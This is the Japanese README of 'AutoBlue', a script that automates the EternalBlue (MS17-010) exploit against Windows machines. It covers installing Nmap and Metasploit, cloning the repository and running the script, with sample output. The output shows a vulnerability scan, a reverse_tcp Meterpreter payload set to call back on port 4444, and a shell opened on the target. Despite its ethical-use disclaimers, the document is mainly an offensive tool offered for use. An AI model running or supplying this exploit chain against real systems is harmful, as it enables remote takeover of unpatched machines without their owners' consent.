
AutoBlue - 自動化EternalBlue(CVE-2017-0144 / MS17-010)エクスプロイトツール。NmapとMetasploitを活用し、倫理的ハッキング、ペネトレーションテスト、CTFチャレンジ向け。許可を得た教育目的のみに厳格に使用してください!
AUTOBLUE は、Windowsマシンに対する EternalBlue脆弱性 (CVE-2017-0144) を悪用するために設計された自動化ツールです。このツールは、脆弱性スキャンに Nmap の機能と、エクスプロイトに Metasploit の msfconsole を統合しており、ユーザーが脆弱なシステムを自動的に識別し、EternalBlueエクスプロイトを起動してターゲットにリモートアクセスすることを可能にします。
このツールは主に、Capture The Flag (CTF) チャレンジ、ペネトレーションテスト業務、ラボ環境などの管理された承認済み環境で作業するセキュリティ専門家、ペネトレーションテスター、倫理的ハッカーを対象としています。AUTOBLUE を使用すると、ターゲットIPアドレスを入力するだけで、最小限の手動操作でEternalBlue脆弱性を悪用できます。
機能
自動脆弱性スキャン: Nmapを使用して、ターゲットマシンのEternalBlue脆弱性 (CVE-2017-0144) をスキャンします。
シームレスなエクスプロイト: Metasploit の msfconsole を利用して、EternalBlue エクスプロイトを自動的に起動します。
シンプルなセットアップ: ターゲットIPアドレスと、Nmap および Metasploit がインストールされた動作環境のみが必要です。
出力レポート: エクスプロイト試行の成功または失敗を示す出力を生成します。
目次
前提条件
インストール
使用方法
動作の仕組み
セキュリティ上の考慮事項
貢献
ライセンス
謝辞
免責事項
前提条件:
AUTOBLUE を使用する前に、次のツールがマシンにインストールされていることを確認してください:
Nmap: 脆弱なマシンを検出するためのネットワークスキャンツール。
Metasploit Framework: EternalBlue のエクスプロイトを含むペネトレーションテストプラットフォーム。
Nmapのインストール:
コードをコピー
sudo apt update
および
sudo apt install nmap
Windows または macOS の場合は、公式ウェブサイトから Nmap をダウンロードしてください。
Metasploitのインストール:
Linux (Debian系) の場合:
コードをコピー
sudo apt update
および
sudo apt install metasploit-framework
Windows または macOS の場合は、公式ウェブサイトから Metasploit をダウンロードしてください。
インストール:
AUTOBLUE をインストールするには、次の手順に従ってください:
リポジトリをクローン:
git clone https://github.com/AtithKhawas/autoblue.git
および
cd autoblue
前提条件として、Nmap と Metasploit が正しくインストールされていることを確認してください。
スクリプトを実行可能にする:
chmod +x autoblue.sh
使用方法:
AUTOBLUE は、EternalBlue 脆弱性のスキャンとエクスプロイトを自動化するように設計されています。使用方法は次のとおりです:
AUTOBLUE を使用するには、ターミナルで次のコマンドを実行します:
コードをコピー
./autoblue.sh
出力:
┌──(root㉿kali)-[/home/Elliot]
└─# ./autoblue.sh
============================================
********************************************
AutoBlue - EternalBlue Exploit Automation
********************************************
********************************************
------------------------Made by ATITH KHAWAS
============================================
Enter Target IP Address:
ターゲットIPアドレスと自分のIPアドレスを要求されます。
サンプル
Enter Target IP Address: Target<IP Address>
Enter Your IP Address: Your <IP Address>
ツールを実行すると、Nmap でスキャンが開始されます:
出力-1
Target IP Address: ***.***.**.**
[+] Scanning Target for MS17-010 Vulnerability...
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 12:41 EST
Nmap scan report for ***.***.**.**
Host is up (0.19s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
[+] Target is VULNERABLE to EternalBlue!
ここから本格的な作業が始まり、時間のかかるプロセスが大幅に短縮されます。ターゲットが脆弱な場合、自動的に Msfconsole を起動し、RHOSTS、PAYLOAD、LHOST、LPORT を設定します(デフォルトポートは 4444 です)。
出力-2
[+] Launching Metasploit...
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
RHOSTS => ***.***.**.**
PAYLOAD => windows/x64/meterpreter/reverse_tcp
LHOST => ***.***.**.**
LPORT => 4444
[*] Started reverse TCP handler on ***.***.**.**:4444
そして、ターゲットの Meterpreter シェルを提供します。
出力-3
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > pwd
C:\Windows\system32
動作の仕組み:
Nmap スクリプトスキャン: ツールはまず Nmap スクリプトスキャン (--script smb-vuln-ms17-010) を使用して、ターゲットマシンが EternalBlue エクスプロイトに対して脆弱かどうかを検出します。ポート 445 が開いているか確認し、SMB の脆弱性を特定しようとします。
Metasploit エクスプロイト: ターゲットマシンが脆弱であると判明した場合、AUTOBLUE は Metasploit の msfconsole を使用して EternalBlue エクスプロイトを起動します。スクリプトは必要なペイロードを構成し、脆弱性を悪用するために送信します。
リバースシェル: エクスプロイトが成功すると、リバースシェルが開かれ、被害マシン上でコマンドラインインターフェースを提供します。
フィードバック: ツールはプロセス全体を通じてフィードバックを提供し、ターゲットが正常にエクスプロイトされたかどうか、および関連情報(例:リバースシェルのIPアドレス)を出力します。
セキュリティ上の考慮事項:
法的使用: このツールは承認された環境でのみ使用する必要があります。ターゲットマシンをテストする明示的な許可があり、それが管轄区域内で違法でないことを確認してください。
ユーザー入力: 悪用を防ぐために、信頼できる IP のみをツールに入力するようにしてください。信頼できないシステムでこのツールを実行すると、セキュリティインシデントが発生する可能性があります。
ペイロードのセキュリティ: このツールで使用されるリバースシェルペイロードは本質的にリスクがあります。攻撃マシンやそのリスナーを信頼できないネットワークに公開しないでください。
依存関係の更新: 既知のセキュリティ脆弱性を軽減するために、Nmap と Metasploit を定期的に更新するようにしてください。
貢献:
AUTOBLUE プロジェクトへの貢献を歓迎します。提案、改善、バグ修正がある場合は、リポジトリをフォークしてプルリクエストを作成してください。
ライセンス:
このツールはオープンソースであり、MIT ライセンスの下で配布されています。自分のプロジェクトで自由に使用、変更、配布することができます。ただし、ソフトウェアのすべてのコピーまたは重要な部分にこの表示を含める必要があります。
謝辞:
Nmap: 脆弱性スキャン機能を提供してくれたことに対して。
Metasploit: EternalBlue 脆弱性をエクスプロイトするためのフレームワークを提供してくれたことに対して。
セキュリティ研究者: EternalBlue 脆弱性を発見し、公開してくれたことに対して。これにより世界中のシステムのセキュリティ向上に貢献しました。
免責事項:
AUTOBLUE は教育および倫理的な使用のみを目的としたツールです。作者は、このツールを使用して行われた違法行為について一切の責任を負いません。いかなるシステムに対してもペネトレーションテストを実施する明確な許可を得ていることを確認するのはあなたの責任です。
このツールは自己責任で使用してください。常に安全で法的な環境でペネトレーションテストを実施してください。